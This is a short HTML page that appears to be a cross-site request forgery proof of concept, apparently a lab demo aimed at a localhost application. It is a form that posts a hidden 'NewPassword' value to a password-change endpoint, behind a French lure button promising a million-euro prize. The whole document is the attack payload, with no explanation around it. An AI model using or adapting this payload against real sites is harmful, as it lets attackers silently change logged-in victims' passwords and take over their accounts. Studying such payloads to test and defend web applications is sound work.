<form action="https://localhost:7256/home/password" method="POST">
    <input type="hidden" name="NewPassword" value="arbitrary password" />
    <button type="submit">Gagner 1 000 000 €</button>
</form>